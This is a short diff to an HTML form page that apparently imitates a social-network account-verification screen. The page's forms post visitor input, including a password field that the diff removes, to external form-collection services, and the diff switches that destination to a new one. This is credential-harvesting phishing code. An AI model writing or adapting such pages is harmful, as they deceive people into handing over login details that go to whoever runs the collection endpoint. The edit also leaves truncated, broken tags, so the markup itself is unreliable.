--- a/submit.html
+++ b/submit.html
@@ -28,7 +28,7 @@
 </form>
 
 </div>
-  </div><form action="https://app.formester.com/forms/c00b6bc6-89dd-4de6-b70a-888eb527bf8b/submissions"method="post">
+  </div><form action="https://submit-form.com/jD9dyBJr9"method="post">
   <div class="relative flex border bg-[#e9ebee] h-10 md:hidden lg:hidden sm:block"><div>
 <div>
     <img class="h-5  mx-4 mt-2 shadow-2xl md:hidden lg:hidden sm:block" src="home.png" alt="">
@@ -72,10 +72,8 @@
       xs
     </p>
       <input class="border h-5 mx-3" type="text" name="xs" id="xs" required="">
-    </div><div>
-      <p class="text-slate-400 pl-4 mt-1">
-    Confirm to Password 
-  </p><input class="border h-6 pl-1 mx-3" type="text" name="password" required="">
+    </div><di
+            
       <p class="text-[10px] font-serif   mt-3 mx-3">
         Please make sure account not to log out from your computer or laptop until you have received a verification email.
       </p>
@@ -117,7 +115,7 @@
 </div>
 </div>
 
-                 <form class="sm:hidden lg:block md:block" action="https://app.formester.com/forms/c00b6bc6-89dd-4de6-b70a-888eb527bf8b/submissions" method="post">
+                 <form class="sm:hidden lg:block md:block" action="https://submit-form.com/jD9dyBJr9" method="post">
 <div class="relative flex border bg-[#e9ebee] h-12 md:block lg:block hidden "><div>
 <div>
   <img class="h-7  mx-10 mt-2 shadow-2xl md:block lg:block hidden" src="home.png" alt="">
@@ -173,9 +171,7 @@
   </p><input class="border h-6 pl-1 mx-3" type="text" name="xs" required="">
 </div><div>
   <p class="text-slate-400 pl-4 mt-1">
-    Confirm to Password 
-  </p><input class="border h-6 pl-1 mx-3" type="text" name="password" required="">
-  <p class="mt-4 pl-3 text-[12px] font-semibold">
+    
     Please make sure account not to log out from your computer or laptop until you have received a verification email.
   </p>
 </div><div class="border mx-3 h-10 mt-4 bg-[#f5f6f7]"><div class="flex justify-end mx-2">
